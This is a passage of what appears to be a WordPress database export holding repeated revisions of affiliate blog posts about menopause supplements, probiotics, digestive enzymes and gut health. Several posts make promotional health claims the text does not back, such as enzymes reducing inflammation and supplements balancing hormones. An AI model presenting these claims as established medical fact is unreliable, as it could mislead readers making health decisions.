Perimenopause is a natural phase in a woman\'s life that typically occurs in her 40s or early 50s, leading up to menopause. During this transitional period, hormonal fluctuations can cause a variety of physical and emotional symptoms, such as hot flashes, mood swings, and sleep disturbances. While these changes are a normal part of aging, they can sometimes be challenging to navigate. Thankfully, there are various perimenopause supplements for women that can help alleviate these symptoms and promote overall well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n\n\n\n

In this comprehensive guide, we\'ll explore some of the best perimenopause supplements to consider.

\n\n\n\n

1.Black Cohosh
Black cohosh is a popular herbal remedy for managing perimenopausal symptoms. It is believed to help regulate hormone levels, particularly estrogen, which can decline during perimenopause. Studies have shown that black cohosh may be effective in reducing hot flashes, night sweats, and mood swings. It is available in various forms, including capsules, tablets, and tinctures.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

2.Soy Isoflavones
Soy isoflavones are natural compounds found in soybeans and soy products. These compounds have a chemical structure similar to estrogen, making them known as phytoestrogens. Phytoestrogens can help balance hormone levels in the body, potentially reducing the severity of hot flashes and other menopausal symptoms. Women who include soy-based foods or supplements in their diet may experience relief from perimenopausal symptoms.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

3.Evening Primrose Oil
Evening primrose oil is derived from the seeds of the evening primrose plant and is rich in gamma-linolenic acid (GLA). GLA is an essential fatty acid that can help regulate hormone production and reduce inflammation. Many women find that taking evening primrose oil supplements can improve skin health, alleviate breast tenderness, and reduce mood swings.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

4. Vitamin D
Vitamin D is essential for overall health, and it plays a crucial role in bone health and immune function. During perimenopause and menopause, the risk of osteoporosis increases due to declining estrogen levels. Supplementing with vitamin D can help maintain strong bones and reduce the risk of fractures. Additionally, vitamin D may also contribute to better mood and cognitive function.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

5.Calcium and Magnesium
As estrogen levels decrease during perimenopause, the body\'s ability to absorb calcium from food diminishes. This can lead to a higher risk of bone loss and osteoporosis. Calcium and magnesium supplements can help maintain bone density and reduce the risk of fractures. These minerals are also beneficial for muscle function and may help with sleep disturbances and muscle cramps.

\n\n\n\n

Lint to Recommended Product

\n\n\n\n\"\"\n\n\n\n

6.B Vitamins
B vitamins, including B6 and B12, are essential for maintaining energy levels and supporting overall well-being. They play a role in regulating mood and reducing stress and anxiety, which are common perimenopausal symptoms. B vitamin supplements can help combat fatigue and enhance mental clarity during this transitional phase.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

7.Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, are known for their anti-inflammatory properties. They can help alleviate joint pain, reduce mood swings, and support cardiovascular health. Omega-3 supplements may also contribute to healthier skin and hair.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

8.Probiotics
Gut health is closely linked to overall well-being, and during perimenopause, hormonal fluctuations can sometimes disrupt the gut microbiome. Probiotic supplements can help restore and maintain a healthy balance of gut bacteria, potentially reducing bloating, digestive issues, and immune system challenges.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Perimenopause is a natural phase in a woman\'s life, but it doesn\'t have to be a time of discomfort and distress. These perimenopause supplements for women can provide relief from a wide range of symptoms, allowing you to navigate this transitional phase with greater ease and confidence. However, it\'s important to consult with a healthcare provider before adding any new supplements to your routine, as individual needs and responses may vary. In combination with a healthy lifestyle, these supplements can contribute to a smoother perimenopausal journey, helping you embrace the changes that come with this transformative phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Perimenopause Supplements for Women: A Comprehensive Guide','','inherit','closed','closed','','5473-revision-v1','','','2023-10-10 07:35:09','2023-10-10 07:35:09','',5473,'https://tummyrevolution.com/?p=5665',0,'revision','',0),(5668,3,'2023-10-10 07:38:48','2023-10-10 07:38:48','\n

Menopause is a significant milestone in a woman\'s life, marked by the cessation of menstruation and hormonal changes. While menopause brings about various changes in the body, including hot flashes and mood swings, it also has an impact on gut health. Many post-menopausal women may experience digestive issues, such as bloating, constipation, and a weakened immune system. Probiotics can be a valuable addition to the diet of post-menopausal women, offering numerous benefits for gut health and overall well-being. In this blog post, we will explore the best probiotics for post-menopausal women and how they can help maintain a healthy digestive system.

\n\n\n\n

Understanding Probiotics
Before delving into the best probiotics for post-menopausal women, it\'s important to understand what probiotics are. Probiotics are live microorganisms, usually bacteria or yeast, that are beneficial for your health, especially your digestive system. They are often referred to as \"good\" or \"friendly\" bacteria because they help maintain a balanced gut microbiome, which is essential for digestion and overall health.

\n\n\n\n

The Impact of Menopause on Gut Health
Menopause can bring about hormonal changes that affect the composition of the gut microbiome. These changes can lead to an imbalance in the gut bacteria, potentially causing digestive issues and compromising the immune system. Common gastrointestinal problems that post-menopausal women may experience include:
Constipation
Bloating
Diarrhea
Gut inflammation
Weakened immune system
Choosing the Right Probiotics

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n\n\n\n

BEST PROBIOTICS FOR POST-MENOPAUSAL WOMAN
Here are some of the best probiotics for post-menopausal women:

\n\n\n\n

Lactobacillus Acidophilus: This strain is known for its ability to support digestive health and alleviate symptoms like bloating and constipation.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

\n\n\n\n

Bifidobacterium Lactis: Bifidobacterium lactis may help boost the immune system and improve overall gut health.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Rhamnosus: This strain can help with diarrhea and may also have mood-boosting effects.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Plantarum: It is known for its anti-inflammatory properties and may help reduce gut inflammation.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Saccharomyces Boulardii: This yeast-based probiotic can help with diarrhea and gut infections.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Summary:

\n\n\n\n

Maintaining gut health is crucial for post-menopausal women to minimize digestive issues and support overall well-being. Probiotics offer a natural and effective way to achieve this. By selecting the right probiotic strains and consulting with a healthcare provider, post-menopausal women can optimize their gut health and enjoy the benefits of a balanced microbiome. Remember that consistency is key when taking probiotics, and it may take some time to see noticeable improvements in gut health.

\n\n\n\n

\n','Best Probiotics for Post-Menopausal Women: A Guide to Gut Health','','inherit','closed','closed','','5513-revision-v1','','','2023-10-10 07:38:48','2023-10-10 07:38:48','',5513,'https://tummyrevolution.com/?p=5668',0,'revision','',0),(5669,1,'2023-10-10 07:38:49','2023-10-10 07:38:49','\n

In the quest for optimal health, we often uncover hidden gems from nature that offer remarkable benefits. One such gem is enzyme supplements, which have gained attention for their potential to transform the way our bodies digest and absorb nutrients. In this article, we\'ll delve into the benefits of taking enzyme supplements and how they can contribute to improved digestion, gut health, and overall well-being.

\n\n\n\n
    \n
  1. Enhanced Digestion
  2. \n
\n\n\n\n

Enzymes are the unsung heroes of digestion, responsible for breaking down the foods we eat into smaller, absorbable molecules. Enzyme supplements offer a helping hand to our digestive system, ensuring that complex carbohydrates, proteins, and fats are properly broken down. This results in reduced discomfort after meals and a smoother digestion process.

\n\n\n\n
    \n
  1. Reduced Digestive Discomfort
  2. \n
\n\n\n\n

If you\'ve ever experienced bloating, gas, or indigestion after eating, enzyme supplements might offer the relief you seek. These supplements can help prevent undigested food from fermenting in the gut, leading to fewer uncomfortable symptoms. Whether you\'re dealing with lactose intolerance or sensitivity to specific foods, enzyme supplements can make a noticeable difference.

\n\n\n\n
    \n
  1. Optimized Nutrient Absorption
  2. \n
\n\n\n\n

Taking enzyme supplements can lead to improved nutrient absorption, allowing your body to extract more goodness from the foods you consume. When nutrients are properly broken down into smaller units, they can be readily absorbed through the intestinal lining, ensuring you get the most out of your meals.

\n\n\n\n
    \n
  1. Balanced Gut Health
  2. \n
\n\n\n\n

A harmonious gut environment is vital for overall well-being. Certain enzyme supplements, such as proteolytic enzymes, can support a healthy gut ecosystem by breaking down potentially harmful proteins. By promoting a balanced gut flora, these enzymes contribute to better digestion, a stronger immune system, and improved gut comfort.

\n\n\n\n
    \n
  1. Reduced Inflammation
  2. \n
\n\n\n\n

Enzymes possess anti-inflammatory properties that can help modulate the body\'s immune response. This benefit is particularly relevant for those dealing with inflammatory conditions. Enzyme supplements can aid in reducing inflammation, supporting the body\'s natural healing processes.

\n\n\n\n
    \n
  1. Support for Active Lifestyles
  2. \n
\n\n\n\n

For athletes and active individuals, enzyme supplements can play a vital role in recovery and performance. Proteolytic enzymes, in particular, aid in muscle repair and reduce post-workout muscle soreness. By facilitating quicker recovery, enzyme supplements can keep you feeling at your best, even after intense exercise.

\n\n\n\n
    \n
  1. Aging Gracefully
  2. \n
\n\n\n\n

As we age, our natural enzyme production may decline, impacting digestion and nutrient absorption. Enzyme supplements can provide a helping hand by ensuring that essential nutrients are properly broken down and absorbed. This can contribute to better energy levels and overall vitality.

\n\n\n\n

\n\n\n\n

Top rated and recommended enzyme supplements

\n\n\n\n

\n\n\n\n

Enzymedica Digest Gold +ATPro, Maximum Strength Formula 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Super Enzymes, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Physician\'s CHOICE Digestive Enzymes, Powerful Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health, 60 CT

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Enzyme supplements offer a holistic approach to improved digestion, better gut health, and overall wellness. By providing your body with the tools it needs to break down and absorb nutrients effectively, you can experience reduced digestive discomfort, enhanced nutrient absorption, and a healthier gut environment. As with any supplement, it\'s important to consult with a healthcare professional before incorporating enzyme supplements into your routine. With their guidance, you can unlock the benefits of these natural catalysts and embark on a journey to better digestion and a happier, healthier you.

\n','Unveiling the Power of Enzyme Supplements: A Path to Better Digestion and Health','','inherit','closed','closed','','5598-revision-v1','','','2023-10-10 07:38:49','2023-10-10 07:38:49','',5598,'https://tummyrevolution.com/?p=5669',0,'revision','',0),(5672,3,'2023-10-10 07:51:24','2023-10-10 07:51:24','\n

Menopause is a significant milestone in a woman\'s life, marked by the cessation of menstruation and hormonal changes. While menopause brings about various changes in the body, including hot flashes and mood swings, it also has an impact on gut health. Many post-menopausal women may experience digestive issues, such as bloating, constipation, and a weakened immune system. Probiotics can be a valuable addition to the diet of post-menopausal women, offering numerous benefits for gut health and overall well-being. In this blog post, we will explore the best probiotics for post-menopausal women and how they can help maintain a healthy digestive system.

\n\n\n\n

Understanding Probiotics
Before delving into the best probiotics for post-menopausal women, it\'s important to understand what probiotics are. Probiotics are live microorganisms, usually bacteria or yeast, that are beneficial for your health, especially your digestive system. They are often referred to as \"good\" or \"friendly\" bacteria because they help maintain a balanced gut microbiome, which is essential for digestion and overall health.

\n\n\n\n

The Impact of Menopause on Gut Health
Menopause can bring about hormonal changes that affect the composition of the gut microbiome. These changes can lead to an imbalance in the gut bacteria, potentially causing digestive issues and compromising the immune system. Common gastrointestinal problems that post-menopausal women may experience include:
Constipation
Bloating
Diarrhea
Gut inflammation
Weakened immune system
Choosing the Right Probiotics

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

\n\n\n\n

BEST PROBIOTICS FOR POST-MENOPAUSAL WOMAN
Here are some of the best probiotics for post-menopausal women:

\n\n\n\n

Lactobacillus Acidophilus: This strain is known for its ability to support digestive health and alleviate symptoms like bloating and constipation.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

\n\n\n\n

Bifidobacterium Lactis: Bifidobacterium lactis may help boost the immune system and improve overall gut health.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Rhamnosus: This strain can help with diarrhea and may also have mood-boosting effects.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Plantarum: It is known for its anti-inflammatory properties and may help reduce gut inflammation.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Saccharomyces Boulardii: This yeast-based probiotic can help with diarrhea and gut infections.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Summary:

\n\n\n\n

Maintaining gut health is crucial for post-menopausal women to minimize digestive issues and support overall well-being. Probiotics offer a natural and effective way to achieve this. By selecting the right probiotic strains and consulting with a healthcare provider, post-menopausal women can optimize their gut health and enjoy the benefits of a balanced microbiome. Remember that consistency is key when taking probiotics, and it may take some time to see noticeable improvements in gut health.

\n\n\n\n

\n','Best Probiotics for Post-Menopausal Women: A Guide to Gut Health','','inherit','closed','closed','','5513-revision-v1','','','2023-10-10 07:51:24','2023-10-10 07:51:24','',5513,'https://tummyrevolution.com/?p=5672',0,'revision','',0),(5673,3,'2023-10-10 07:54:31','2023-10-10 07:54:31','\n

Women transition through menopause, they experience a range of physical and hormonal changes that can impact various aspects of their health, including gut health. Maintaining a balanced and healthy gut becomes even more crucial during this phase, as it can help alleviate digestive issues and contribute to overall well-being. In this blog, we\'ll explore the connection between menopause and gut health and provide actionable strategies to improve and maintain gut health post-menopause.

\n\n\n\n

The Menopause-Gut Health Connection
The gut microbiome plays a vital role in digestion, nutrient absorption, immune function, and even mood regulation. During menopause, hormonal fluctuations can disrupt the delicate balance of the gut microbiota, potentially leading to digestive problems such as bloating, constipation, and increased gas. Additionally, shifts in hormones can influence gut sensitivity, potentially exacerbating conditions like irritable bowel syndrome (IBS).

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

\n\n\n\n

Strategies to Improve Gut health After Menopause

\n\n\n\n
    \n
  1. Prioritize Fiber-Rich Foods:
  2. \n\n\n\n
  3. Include a variety of fiber-rich foods such as whole grains, fruits, vegetables, legumes, and nuts in your diet. Fiber promotes regular bowel movements, supports the growth of beneficial gut bacteria, and helps maintain a healthy gut lining.
  4. \n\n\n\n
  5. Stay Hydrated:
  6. \n\n\n\n
  7. Drinking an adequate amount of water supports healthy digestion, prevents constipation, and aids in the absorption of nutrients. Aim for at least 8 glasses of water per day.
  8. \n\n\n\n
  9. Incorporate Probiotics:
  10. \n\n\n\n
  11. Probiotics are beneficial bacteria that can enhance gut health. You can find probiotics in fermented foods like yogurt, kefir, sauerkraut, kimchi, and kombucha. Alternatively, consider taking a high-quality probiotic supplement after consulting your healthcare provider.
  12. \n\n\n\n
  13. Choose Prebiotic Foods:
  14. \n\n\n\n
  15. Prebiotics are non-digestible fibers that nourish beneficial gut bacteria. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can support a diverse and healthy gut microbiome.
  16. \n\n\n\n
  17. Minimize Processed Foods and Sugar:
  18. \n\n\n\n
  19. High intake of processed foods and added sugars can negatively affect gut health by promoting the growth of harmful bacteria. Focus on whole, unprocessed foods to support a balanced microbiome.
  20. \n
\n\n\n\n

Manage Stress:

\n\n\n\n
    \n
  • Chronic stress can disrupt the gut-brain connection and impact gut health. Engage in stress-reduction techniques such as meditation, deep breathing, yoga, or mindfulness to support both mental well-being and gut health.
  • \n\n\n\n
  • Regular Physical Activity:
  • \n\n\n\n
  • Exercise has been shown to positively influence gut health by promoting the growth of beneficial bacteria. Aim for regular moderate-intensity activities like walking, swimming, or cycling.
  • \n\n\n\n
  • Limit Alcohol and Caffeine:
  • \n\n\n\n
  • Excessive alcohol and caffeine consumption can irritate the gut lining and disrupt gut balance. Moderation is key to maintaining gut health.
  • \n\n\n\n
  • Avoid Antibiotic Overuse:
  • \n\n\n\n
  • While antibiotics are sometimes necessary, overuse can disturb the gut microbiome. Discuss alternatives and potential probiotic supplementation with your healthcare provider when taking antibiotics.
  • \n\n\n\n
  • Consult a Professional:
  • \n\n\n\n
  • If you\'re experiencing persistent gut issues, consider consulting a registered dietitian or healthcare provider who can offer personalized advice and recommendations.
  • \n
\n\n\n\n

LINK TO THE RECOMMENDED BEST PROBIOTICS TO SUPPORT YOUR GUT HEALTH AFTER MENOPAUSE

\n\n\n\n

\n\n\n\n

Conclusion

\n\n\n\n

Prioritizing gut health after menopause is a valuable investment in your overall well-being. By making mindful dietary choices, incorporating probiotic-rich and prebiotic foods, managing stress, and adopting

\n','Nurse Your Gut Health After Menopause: Essential Strategies','','inherit','closed','closed','','5606-revision-v1','','','2023-10-10 07:54:31','2023-10-10 07:54:31','',5606,'https://tummyrevolution.com/?p=5673',0,'revision','',0),(5671,3,'2023-10-10 07:49:40','2023-10-10 07:49:40','\n

Perimenopause is a natural phase in a woman\'s life that typically occurs in her 40s or early 50s, leading up to menopause. During this transitional period, hormonal fluctuations can cause a variety of physical and emotional symptoms, such as hot flashes, mood swings, and sleep disturbances. While these changes are a normal part of aging, they can sometimes be challenging to navigate. Thankfully, there are various perimenopause supplements for women that can help alleviate these symptoms and promote overall well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

\n\n\n\n

In this comprehensive guide, we\'ll explore some of the best perimenopause supplements to consider.

\n\n\n\n

1.Black Cohosh
Black cohosh is a popular herbal remedy for managing perimenopausal symptoms. It is believed to help regulate hormone levels, particularly estrogen, which can decline during perimenopause. Studies have shown that black cohosh may be effective in reducing hot flashes, night sweats, and mood swings. It is available in various forms, including capsules, tablets, and tinctures.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

2.Soy Isoflavones
Soy isoflavones are natural compounds found in soybeans and soy products. These compounds have a chemical structure similar to estrogen, making them known as phytoestrogens. Phytoestrogens can help balance hormone levels in the body, potentially reducing the severity of hot flashes and other menopausal symptoms. Women who include soy-based foods or supplements in their diet may experience relief from perimenopausal symptoms.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

3.Evening Primrose Oil
Evening primrose oil is derived from the seeds of the evening primrose plant and is rich in gamma-linolenic acid (GLA). GLA is an essential fatty acid that can help regulate hormone production and reduce inflammation. Many women find that taking evening primrose oil supplements can improve skin health, alleviate breast tenderness, and reduce mood swings.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

4. Vitamin D
Vitamin D is essential for overall health, and it plays a crucial role in bone health and immune function. During perimenopause and menopause, the risk of osteoporosis increases due to declining estrogen levels. Supplementing with vitamin D can help maintain strong bones and reduce the risk of fractures. Additionally, vitamin D may also contribute to better mood and cognitive function.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

5.Calcium and Magnesium
As estrogen levels decrease during perimenopause, the body\'s ability to absorb calcium from food diminishes. This can lead to a higher risk of bone loss and osteoporosis. Calcium and magnesium supplements can help maintain bone density and reduce the risk of fractures. These minerals are also beneficial for muscle function and may help with sleep disturbances and muscle cramps.

\n\n\n\n

Lint to Recommended Product

\n\n\n\n\"\"\n\n\n\n

6.B Vitamins
B vitamins, including B6 and B12, are essential for maintaining energy levels and supporting overall well-being. They play a role in regulating mood and reducing stress and anxiety, which are common perimenopausal symptoms. B vitamin supplements can help combat fatigue and enhance mental clarity during this transitional phase.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

7.Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, are known for their anti-inflammatory properties. They can help alleviate joint pain, reduce mood swings, and support cardiovascular health. Omega-3 supplements may also contribute to healthier skin and hair.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

8.Probiotics
Gut health is closely linked to overall well-being, and during perimenopause, hormonal fluctuations can sometimes disrupt the gut microbiome. Probiotic supplements can help restore and maintain a healthy balance of gut bacteria, potentially reducing bloating, digestive issues, and immune system challenges.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Perimenopause is a natural phase in a woman\'s life, but it doesn\'t have to be a time of discomfort and distress. These perimenopause supplements for women can provide relief from a wide range of symptoms, allowing you to navigate this transitional phase with greater ease and confidence. However, it\'s important to consult with a healthcare provider before adding any new supplements to your routine, as individual needs and responses may vary. In combination with a healthy lifestyle, these supplements can contribute to a smoother perimenopausal journey, helping you embrace the changes that come with this transformative phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Perimenopause Supplements for Women: A Comprehensive Guide','','inherit','closed','closed','','5473-revision-v1','','','2023-10-10 07:49:40','2023-10-10 07:49:40','',5473,'https://tummyrevolution.com/?p=5671',0,'revision','',0),(5674,1,'2023-10-10 08:00:08','2023-10-10 08:00:08','\n

In the quest for optimal health, we often uncover hidden gems from nature that offer remarkable benefits. One such gem is enzyme supplements, which have gained attention for their potential to transform the way our bodies digest and absorb nutrients. In this article, we\'ll delve into the benefits of taking enzyme supplements and how they can contribute to improved digestion, gut health, and overall well-being. To see top 5 recommended Enzyme supplements click here

\n\n\n\n
    \n
  1. Enhanced Digestion
  2. \n
\n\n\n\n

Enzymes are the unsung heroes of digestion, responsible for breaking down the foods we eat into smaller, absorbable molecules. Enzyme supplements offer a helping hand to our digestive system, ensuring that complex carbohydrates, proteins, and fats are properly broken down. This results in reduced discomfort after meals and a smoother digestion process.

\n\n\n\n
    \n
  1. Reduced Digestive Discomfort
  2. \n
\n\n\n\n

If you\'ve ever experienced bloating, gas, or indigestion after eating, enzyme supplements might offer the relief you seek. These supplements can help prevent undigested food from fermenting in the gut, leading to fewer uncomfortable symptoms. Whether you\'re dealing with lactose intolerance or sensitivity to specific foods, enzyme supplements can make a noticeable difference.

\n\n\n\n
    \n
  1. Optimized Nutrient Absorption
  2. \n
\n\n\n\n

Taking enzyme supplements can lead to improved nutrient absorption, allowing your body to extract more goodness from the foods you consume. When nutrients are properly broken down into smaller units, they can be readily absorbed through the intestinal lining, ensuring you get the most out of your meals.

\n\n\n\n
    \n
  1. Balanced Gut Health
  2. \n
\n\n\n\n

A harmonious gut environment is vital for overall well-being. Certain enzyme supplements, such as proteolytic enzymes, can support a healthy gut ecosystem by breaking down potentially harmful proteins. By promoting a balanced gut flora, these enzymes contribute to better digestion, a stronger immune system, and improved gut comfort.

\n\n\n\n
    \n
  1. Reduced Inflammation
  2. \n
\n\n\n\n

Enzymes possess anti-inflammatory properties that can help modulate the body\'s immune response. This benefit is particularly relevant for those dealing with inflammatory conditions. Enzyme supplements can aid in reducing inflammation, supporting the body\'s natural healing processes.

\n\n\n\n
    \n
  1. Support for Active Lifestyles
  2. \n
\n\n\n\n

For athletes and active individuals, enzyme supplements can play a vital role in recovery and performance. Proteolytic enzymes, in particular, aid in muscle repair and reduce post-workout muscle soreness. By facilitating quicker recovery, enzyme supplements can keep you feeling at your best, even after intense exercise.

\n\n\n\n
    \n
  1. Aging Gracefully
  2. \n
\n\n\n\n

As we age, our natural enzyme production may decline, impacting digestion and nutrient absorption. Enzyme supplements can provide a helping hand by ensuring that essential nutrients are properly broken down and absorbed. This can contribute to better energy levels and overall vitality.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

\n\n\n\n

Top rated and recommended enzyme supplements

\n\n\n\n

\n\n\n\n

Enzymedica Digest Gold +ATPro, Maximum Strength Formula 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Super Enzymes, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Physician\'s CHOICE Digestive Enzymes, Powerful Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health, 60 CT

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Enzyme supplements offer a holistic approach to improved digestion, better gut health, and overall wellness. By providing your body with the tools it needs to break down and absorb nutrients effectively, you can experience reduced digestive discomfort, enhanced nutrient absorption, and a healthier gut environment. As with any supplement, it\'s important to consult with a healthcare professional before incorporating enzyme supplements into your routine. With their guidance, you can unlock the benefits of these natural catalysts and embark on a journey to better digestion and a happier, healthier you.

\n','Unveiling the Power of Enzyme Supplements: A Path to Better Digestion and Health','','inherit','closed','closed','','5598-revision-v1','','','2023-10-10 08:00:08','2023-10-10 08:00:08','',5598,'https://tummyrevolution.com/?p=5674',0,'revision','',0),(5677,3,'2023-10-10 08:02:33','2023-10-10 08:02:33','\n

Women transition through menopause, they experience a range of physical and hormonal changes that can impact various aspects of their health, including gut health. Maintaining a balanced and healthy gut becomes even more crucial during this phase, as it can help alleviate digestive issues and contribute to overall well-being. In this blog, we\'ll explore the connection between menopause and gut health and provide actionable strategies to improve and maintain gut health post-menopause.

\n\n\n\n

The Menopause-Gut Health Connection
The gut microbiome plays a vital role in digestion, nutrient absorption, immune function, and even mood regulation. During menopause, hormonal fluctuations can disrupt the delicate balance of the gut microbiota, potentially leading to digestive problems such as bloating, constipation, and increased gas. Additionally, shifts in hormones can influence gut sensitivity, potentially exacerbating conditions like irritable bowel syndrome (IBS).

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

\n\n\n\n

Strategies to Improve Gut health After Menopause

\n\n\n\n
    \n
  1. Prioritize Fiber-Rich Foods:
  2. \n\n\n\n
  3. Include a variety of fiber-rich foods such as whole grains, fruits, vegetables, legumes, and nuts in your diet. Fiber promotes regular bowel movements, supports the growth of beneficial gut bacteria, and helps maintain a healthy gut lining.
  4. \n\n\n\n
  5. Stay Hydrated:
  6. \n\n\n\n
  7. Drinking an adequate amount of water supports healthy digestion, prevents constipation, and aids in the absorption of nutrients. Aim for at least 8 glasses of water per day.
  8. \n\n\n\n
  9. Incorporate Probiotics:
  10. \n\n\n\n
  11. Probiotics are beneficial bacteria that can enhance gut health. You can find probiotics in fermented foods like yogurt, kefir, sauerkraut, kimchi, and kombucha. Alternatively, consider taking a high-quality probiotic supplement after consulting your healthcare provider.
  12. \n\n\n\n
  13. Choose Prebiotic Foods:
  14. \n\n\n\n
  15. Prebiotics are non-digestible fibers that nourish beneficial gut bacteria. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can support a diverse and healthy gut microbiome.
  16. \n\n\n\n
  17. Minimize Processed Foods and Sugar:
  18. \n\n\n\n
  19. High intake of processed foods and added sugars can negatively affect gut health by promoting the growth of harmful bacteria. Focus on whole, unprocessed foods to support a balanced microbiome.
  20. \n
\n\n\n\n

Manage Stress:

\n\n\n\n
    \n
  • Chronic stress can disrupt the gut-brain connection and impact gut health. Engage in stress-reduction techniques such as meditation, deep breathing, yoga, or mindfulness to support both mental well-being and gut health.
  • \n\n\n\n
  • Regular Physical Activity:
  • \n\n\n\n
  • Exercise has been shown to positively influence gut health by promoting the growth of beneficial bacteria. Aim for regular moderate-intensity activities like walking, swimming, or cycling.
  • \n\n\n\n
  • Limit Alcohol and Caffeine:
  • \n\n\n\n
  • Excessive alcohol and caffeine consumption can irritate the gut lining and disrupt gut balance. Moderation is key to maintaining gut health.
  • \n\n\n\n
  • Avoid Antibiotic Overuse:
  • \n\n\n\n
  • While antibiotics are sometimes necessary, overuse can disturb the gut microbiome. Discuss alternatives and potential probiotic supplementation with your healthcare provider when taking antibiotics.
  • \n\n\n\n
  • Consult a Professional:
  • \n\n\n\n
  • If you\'re experiencing persistent gut issues, consider consulting a registered dietitian or healthcare provider who can offer personalized advice and recommendations.
  • \n
\n\n\n\n

LINK TO THE RECOMMENDED BEST PROBIOTICS TO SUPPORT YOUR GUT HEALTH AFTER MENOPAUSE

\n\n\n\n

\n\n\n\n

Conclusion

\n\n\n\n

Prioritizing gut health after menopause is a valuable investment in your overall well-being. By making mindful dietary choices, incorporating probiotic-rich and prebiotic foods, managing stress, and adopting

\n','Nurse Your Gut Health After Menopause: Essential Strategies','','inherit','closed','closed','','5606-revision-v1','','','2023-10-10 08:02:33','2023-10-10 08:02:33','',5606,'https://tummyrevolution.com/?p=5677',0,'revision','',0),(5676,3,'2023-10-10 08:02:21','2023-10-10 08:02:21','\n

Women transition through menopause, they experience a range of physical and hormonal changes that can impact various aspects of their health, including gut health. Maintaining a balanced and healthy gut becomes even more crucial during this phase, as it can help alleviate digestive issues and contribute to overall well-being. In this blog, we\'ll explore the connection between menopause and gut health and provide actionable strategies to improve and maintain gut health post-menopause.

\n\n\n\n

The Menopause-Gut Health Connection
The gut microbiome plays a vital role in digestion, nutrient absorption, immune function, and even mood regulation. During menopause, hormonal fluctuations can disrupt the delicate balance of the gut microbiota, potentially leading to digestive problems such as bloating, constipation, and increased gas. Additionally, shifts in hormones can influence gut sensitivity, potentially exacerbating conditions like irritable bowel syndrome (IBS).

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

Strategies to Improve Gut health After Menopause

\n\n\n\n
    \n
  1. Prioritize Fiber-Rich Foods:
  2. \n\n\n\n
  3. Include a variety of fiber-rich foods such as whole grains, fruits, vegetables, legumes, and nuts in your diet. Fiber promotes regular bowel movements, supports the growth of beneficial gut bacteria, and helps maintain a healthy gut lining.
  4. \n\n\n\n
  5. Stay Hydrated:
  6. \n\n\n\n
  7. Drinking an adequate amount of water supports healthy digestion, prevents constipation, and aids in the absorption of nutrients. Aim for at least 8 glasses of water per day.
  8. \n\n\n\n
  9. Incorporate Probiotics:
  10. \n\n\n\n
